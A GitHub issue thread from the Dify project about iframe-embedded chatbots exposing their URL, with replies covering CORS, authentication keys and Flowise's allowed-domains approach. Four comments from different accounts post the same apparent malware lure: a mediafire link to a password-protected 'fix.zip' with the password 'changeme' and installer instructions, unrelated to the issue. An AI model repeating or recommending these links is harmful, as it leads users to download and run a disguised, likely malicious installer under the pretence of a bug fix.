### ISSUE TITLE
Embeding chatbot with iframe will expose the url

### ISSUE THREAD

**Issue by taowang1993** [langgenius/dify#7742]
### Self Checks

- [X] This is only for bug report, if you would like to ask a question, please head to [Discussions](https://github.com/langgenius/dify/discussions/categories/general).
- [X] I have searched for existing issues [search for existing issues](https://github.com/langgenius/dify/issues), including closed ones.
- [X] I confirm that I am using English to submit this report (我已阅读并同意 [Language Policy](https://github.com/langgenius/dify/issues/1542)).
- [X] [FOR CHINESE USERS] 请务必使用英文提交 Issue，否则会被关闭。谢谢！:）
- [X] Please do not modify this template :) and fill in all the required fields.

### Dify version

0.7.2

### Cloud or Self Hosted

Cloud

### Steps to reproduce

If I embed this chatbot, technical users can just inspect the code and find the url.
Then, they can bypass paywall and use the chatbot.
How to prevent this?

<iframe src="https://udify.app/chatbot/xxxxxxxxxxxxxxxxxx" style="width: 100%; height: 100%; min-height: 700px" frameborder="0" allow="microphone"> </iframe>

**Comment by cnhbliyou** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by HeinousAgenda38** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by crazywoola** [comment]
This is an expected behavior.

**Comment by taowang1993** [comment]
Is it possible to configure CORS to only allow my own domain to embed the chatbot?

If others find out my chatbot url, they can embed it on their website and consume my tokens.

**Comment by taowang1993** [comment]
> This is an expected behavior.

Is this going to be fixed in near future? I don't want others embed my chatbot.

**Comment by GoulartNogueira** [comment]
It will probably not be "fixed" as it's not "broken".
[That's how iframe works](https://stackoverflow.com/questions/69324577/how-to-hide-src-attribute-value-url-in-iframe-tag), not an issue with Dify.

If you want to protect your chatbot, I suggest one of 2 ways:
1. Deploy your application with [another approach](https://docs.dify.ai/guides/application-publishing) other than iframe.
2. Keep using iframe, but use some security method inside dify to make sure the user is authenticated. For example: Create a key, set a lifetime to it, store it in your backend. Inject it into the iframe with `window.difyChatbotConfig`. Then inside your bot, before calling any LLM you must always call an API to check if the key is valid.

Either way, you must pick some kind of complexity.
I'd recommend the first.

**Comment by taowang1993** [comment]
Flowise has this secure approach of embedding chatbot.

<flowise-fullchatbot></flowise-fullchatbot>
<script type="module">
    import Chatbot from "https://cdn.jsdelivr.net/npm/flowise-embed/dist/web.js"
    Chatbot.init({
        chatflowid: "f5adc8af-d9e3-4735-af79-886f237",
        apiHost: "https://taowang1993-flowise.hf.space",
    })
</script>

Then, you can set up Allowed Domains for embedding your chatbot. So, only your website can embed your chatbot.

I wish Dify has this as well. I would love to make contributions, but I am not very technical.

**Comment by ManasN** [comment]
I am surprised not many people are facing an issue in this regard. What @taowang1993 has posted seems indeed a sane approach to me, any update on this?
